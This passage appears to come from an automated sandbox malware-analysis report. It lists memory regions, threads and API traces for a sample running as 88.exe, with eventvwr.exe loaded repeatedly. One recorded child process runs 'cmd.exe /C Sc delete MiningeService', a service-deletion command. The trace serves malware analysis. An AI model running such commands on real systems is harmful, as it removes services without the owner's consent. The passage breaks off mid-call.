0x174fff monitored = 0 entry_point = 0x131064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5683 start_va = 0x130000 end_va = 0x174fff monitored = 0 entry_point = 0x131064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5684 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5685 start_va = 0x130000 end_va = 0x143fff monitored = 0 entry_point = 0x1325af region_type = mapped_file name = "eventvwr.exe" filename = "\\Windows\\SysWOW64\\eventvwr.exe" (normalized: "c:\\windows\\syswow64\\eventvwr.exe") Region: id = 5686 start_va = 0x2050000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 5687 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 5688 start_va = 0x20d0000 end_va = 0x239efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5689 start_va = 0x1ef0000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 5690 start_va = 0x7feff160000 end_va = 0x7feff176fff monitored = 0 entry_point = 0x7feff161070 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 5691 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 5692 start_va = 0x23a0000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 5693 start_va = 0x130000 end_va = 0x143fff monitored = 0 entry_point = 0x1325af region_type = mapped_file name = "eventvwr.exe" filename = "\\Windows\\SysWOW64\\eventvwr.exe" (normalized: "c:\\windows\\syswow64\\eventvwr.exe") Region: id = 5694 start_va = 0x130000 end_va = 0x143fff monitored = 0 entry_point = 0x1325af region_type = mapped_file name = "eventvwr.exe" filename = "\\Windows\\SysWOW64\\eventvwr.exe" (normalized: "c:\\windows\\syswow64\\eventvwr.exe") Region: id = 5696 start_va = 0xe0000 end_va = 0xe9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 5697 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5698 start_va = 0x7fefcc80000 end_va = 0x7fefcccbfff monitored = 0 entry_point = 0x7fefcc87950 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5699 start_va = 0x130000 end_va = 0x143fff monitored = 0 entry_point = 0x1325af region_type = mapped_file name = "eventvwr.exe" filename = "\\Windows\\SysWOW64\\eventvwr.exe" (normalized: "c:\\windows\\syswow64\\eventvwr.exe") Region: id = 5703 start_va = 0x130000 end_va = 0x163fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntexe.cat" filename = "\\Windows\\System32\\catroot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\ntexe.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\ntexe.cat") Region: id = 5704 start_va = 0x7fefd1c0000 end_va = 0x7fefd20ffff monitored = 0 entry_point = 0x7fefd1c11e0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 5706 start_va = 0x23a0000 end_va = 0x249ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 5707 start_va = 0x24c0000 end_va = 0x253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 5711 start_va = 0x2540000 end_va = 0x273ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 5712 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 5713 start_va = 0x2770000 end_va = 0x27effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 5714 start_va = 0x7fef6850000 end_va = 0x7fef6876fff monitored = 0 entry_point = 0x7fef6851098 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 5715 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 5716 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 5720 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 5721 start_va = 0x170000 end_va = 0x186fff monitored = 0 entry_point = 0x1725af region_type = mapped_file name = "eventvwr.exe" filename = "\\Windows\\SysWOW64\\eventvwr.exe" (normalized: "c:\\windows\\syswow64\\eventvwr.exe") Region: id = 5722 start_va = 0x190000 end_va = 0x191fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eventvwr.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\eventvwr.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\eventvwr.exe.mui") Region: id = 5756 start_va = 0x2800000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 5757 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 5758 start_va = 0x170000 end_va = 0x186fff monitored = 0 entry_point = 0x1725af region_type = mapped_file name = "eventvwr.exe" filename = "\\Windows\\SysWOW64\\eventvwr.exe" (normalized: "c:\\windows\\syswow64\\eventvwr.exe") Region: id = 5759 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 5760 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5761 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5762 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 5763 start_va = 0x7fefdb20000 end_va = 0x7fefdc97fff monitored = 0 entry_point = 0x7fefdb210e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 5764 start_va = 0x7fefee00000 end_va = 0x7fefef29fff monitored = 0 entry_point = 0x7fefee010d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 5765 start_va = 0x7feff860000 end_va = 0x7feffab8fff monitored = 0 entry_point = 0x7feff861340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 5766 start_va = 0x190000 end_va = 0x1a3fff monitored = 0 entry_point = 0x1925af region_type = mapped_file name = "eventvwr.exe" filename = "\\Windows\\SysWOW64\\eventvwr.exe" (normalized: "c:\\windows\\syswow64\\eventvwr.exe") Region: id = 5767 start_va = 0x190000 end_va = 0x1a6fff monitored = 0 entry_point = 0x1925af region_type = mapped_file name = "eventvwr.exe" filename = "\\Windows\\SysWOW64\\eventvwr.exe" (normalized: "c:\\windows\\syswow64\\eventvwr.exe") Region: id = 5768 start_va = 0x230000 end_va = 0x231fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eventvwr.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\eventvwr.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\eventvwr.exe.mui") Region: id = 5769 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5770 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Thread: id = 215 os_tid = 0x8dc Thread: id = 216 os_tid = 0x8e0 Thread: id = 217 os_tid = 0x8e4 Thread: id = 218 os_tid = 0x8e8 Thread: id = 219 os_tid = 0x8ec Thread: id = 221 os_tid = 0x8f8 Process: id = "24" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x77a38000" os_pid = "0x8f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xc94" cmd_line = "C:\\Windows\\system32\\cmd.exe /C Sc delete MiningeService" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5723 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5724 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5725 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5726 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5727 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5728 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 5729 start_va = 0x2c0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 5730 start_va = 0x49da0000 end_va = 0x49debfff monitored = 1 entry_point = 0x49da829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5731 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5732 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5733 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 5734 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 5735 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 5736 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 5737 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5738 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5739 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5740 start_va = 0x4b0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 5741 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5742 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5743 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5744 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5745 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5746 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5747 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 5748 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5749 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 5750 start_va = 0x530000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5751 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5752 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5753 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5754 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5755 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5771 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5772 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5773 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5774 start_va = 0x753f0000 end_va = 0x753f6fff monitored = 0 entry_point = 0x753f1230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 5775 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5776 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5777 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 5778 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 5779 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5780 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5781 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5782 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5783 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5784 start_va = 0x720000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 5785 start_va = 0xe0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5786 start_va = 0x720000 end_va = 0x8a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 5787 start_va = 0x900000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 5788 start_va = 0xe0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5789 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5790 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5791 start_va = 0x910000 end_va = 0xa90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 5792 start_va = 0xaa0000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 5793 start_va = 0xe0000 end_va = 0xfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 5794 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5795 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 5796 start_va = 0x1ea0000 end_va = 0x216efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 220 os_tid = 0x8f4 [0271.779] GetProcAddress (hModule=0x769b0000, lpProcName="SetConsoleInputExeNameW") returned 0x769da775 [0271.780] GetProcessHeap () returned 0x620000 [0271.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x400a) returned 0x6358d0 [0271.780] GetProcessHeap () returned 0x620000 [0271.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6358d0 | out: hHeap=0x620000) returned 1 [0271.781] _wcsicmp (_String1="Sc", _String2=")") returned 74 [0271.781] _wcsicmp (_String1="FOR", _String2="Sc") returned -13 [0271.781] _wcsicmp (_String1="FOR/?", _String2="Sc") returned -13 [0271.781] _wcsicmp (_String1="IF", _String2="Sc") returned -10 [0271.781] _wcsicmp (_String1="IF/?", _String2="Sc") returned -10 [0271.781] _wcsicmp (_String1="REM", _String2="Sc") returned -1 [0271.781] _wcsicmp (_String1="REM/?", _String2="Sc") returned -1 [0271.781] GetProcessHeap () returned 0x620000 [0271.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x58) returned 0x6330a0 [0271.781] GetProcessHeap () returned 0x620000 [0271.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xe) returned 0x630038 [0271.782] GetProcessHeap () returned 0x620000 [0271.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x633100 [0271.783] GetConsoleTitleW (in: lpConsoleTitle=0x3bf8e0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe") returned 0x2b [0271.784] _wcsicmp (_String1="Sc", _String2="DIR") returned 15 [0271.784] _wcsicmp (_String1="Sc", _String2="ERASE") returned 14 [0271.784] _wcsicmp (_String1="Sc", _String2="DEL") returned 15 [0271.784] _wcsicmp (_String1="Sc", _String2="TYPE") returned -1 [0271.784] _wcsicmp (_String1="Sc", _String2="COPY") returned 16 [0271.784] _wcsicmp (_String1="Sc", _String2="CD") returned 16 [0271.784] _wcsicmp (_String1="Sc", _String2="CHDIR") returned 16 [0271.784] _wcsicmp (_String1="Sc", _String2="RENAME") returned 1 [0271.784] _wcsicmp (_String1="Sc", _String2="REN") returned 1 [0271.784] _wcsicmp (_String1="Sc", _String2="ECHO") returned 14 [0271.784] _wcsicmp (_String1="Sc", _String2="SET") returned -2 [0271.784] _wcsicmp (_String1="Sc", _String2="PAUSE") returned 3 [0271.784] _wcsicmp (_String1="Sc", _String2="DATE") returned 15 [0271.784] _wcsicmp (_String1="Sc", _String2="TIME") returned -1 [0271.784] _wcsicmp (_String1="Sc", _String2="PROMPT") returned 3 [0271.784] _wcsicmp (_String1="Sc", _String2="MD") returned 6 [0271.784] _wcsicmp (_String1="Sc", _String2="MKDIR") returned 6 [0271.784] _wcsicmp (_String1="Sc", _String2="RD") returned 1 [0271.784] _wcsicmp (_String1="Sc", _String2="RMDIR") returned 1 [0271.784] _wcsicmp (_String1="Sc", _String2="PATH") returned 3 [0271.784] _wcsicmp (_String1="Sc", _String2="GOTO") returned 12 [0271.784] _wcsicmp (_String1="Sc", _String2="SHIFT") returned -5 [0271.784] _wcsicmp (_String1="Sc", _String2="CLS") returned 16 [0271.784] _wcsicmp (_String1="Sc", _String2="CALL") returned 16 [0271.785] _wcsicmp (_String1="Sc", _String2="VERIFY") returned -3 [0271.785] _wcsicmp (_String1="Sc", _String2="VER") returned -3 [0271.785] _wcsicmp (_String1="Sc", _String2="VOL") returned -3 [0271.785] _wcsicmp (_String1="Sc", _String2="EXIT") returned 14 [0271.785] _wcsicmp (_String1="Sc", _String2="SETLOCAL") returned -2 [0271.785] _wcsicmp (_String1="Sc", _String2="ENDLOCAL") returned 14 [0271.785] _wcsicmp (_String1="Sc", _String2="TITLE") returned -1 [0271.785] _wcsicmp (_String1="Sc", _String2="START") returned -17 [0271.785] _wcsicmp (_String1="Sc", _String2="DPATH") returned 15 [0271.785] _wcsicmp (_String1="Sc", _String2="KEYS") returned 8 [0271.785] _wcsicmp (_String1="Sc", _String2="MOVE") returned 6 [0271.785] _wcsicmp (_String1="Sc", _String2="PUSHD") returned 3 [0271.785] _wcsicmp (_String1="Sc", _String2="POPD") returned 3 [0271.785] _wcsicmp (_String1="Sc", _String2="ASSOC") returned 18 [0271.785] _wcsicmp (_String1="Sc", _String2="FTYPE") returned 13 [0271.785] _wcsicmp (_String1="Sc", _String2="BREAK") returned 17 [0271.785] _wcsicmp (_String1="Sc", _String2="COLOR") returned 16 [0271.785] _wcsicmp (_String1="Sc", _String2="MKLINK") returned 6 [0271.785] _wcsicmp (_String1="Sc", _String2="DIR") returned 15 [0271.785] _wcsicmp (_String1="Sc", _String2="ERASE") returned 14 [0271.785] _wcsicmp (_String1="Sc", _String2="DEL") returned 15 [0271.785] _wcsicmp (_String1="Sc", _String2="TYPE") returned -1 [0271.785] _wcsicmp (_String1="Sc", _String2="COPY") returned 16 [0271.785] _wcsicmp (_String1="Sc", _String2="CD") returned 16 [0271.785] _wcsicmp (_String1="Sc", _String2="CHDIR") returned 16 [0271.786] _wcsicmp (_String1="Sc", _String2="RENAME") returned 1 [0271.786] _wcsicmp (_String1="Sc", _String2="REN") returned 1 [0271.786] _wcsicmp (_String1="Sc", _String2="ECHO") returned 14 [0271.786] _wcsicmp (_String1="Sc", _String2="SET") returned -2 [0271.786] _wcsicmp (_String1="Sc", _String2="PAUSE") returned 3 [0271.786] _wcsicmp (_String1="Sc", _String2="DATE") returned 15 [0271.786] _wcsicmp (_String1="Sc", _String2="TIME") returned -1 [0271.786] _wcsicmp (_String1="Sc", _String2="PROMPT") returned 3 [0271.786] _wcsicmp (_String1="Sc", _String2="MD") returned 6 [0271.786] _wcsicmp (_String1="Sc", _String2="MKDIR") returned 6 [0271.786] _wcsicmp (_String1="Sc", _String2="RD") returned 1 [0271.786] _wcsicmp (_String1="Sc", _String2="RMDIR") returned 1 [0271.786] _wcsicmp (_String1="Sc", _String2="PATH") returned 3 [0271.786] _wcsicmp (_String1="Sc", _String2="GOTO") returned 12 [0271.786] _wcsicmp (_String1="Sc", _String2="SHIFT") returned -5 [0271.786] _wcsicmp (_String1="Sc", _String2="CLS") returned 16 [0271.786] _wcsicmp (_String1="Sc", _String2="CALL") returned 16 [0271.786] _wcsicmp (_String1="Sc", _String2="VERIFY") returned -3 [0271.786] _wcsicmp (_String1="Sc", _String2="VER") returned -3 [0271.786] _wcsicmp (_String1="Sc", _String2="VOL") returned -3 [0271.786] _wcsicmp (_String1="Sc", _String2="EXIT") returned 14 [0271.786] _wcsicmp 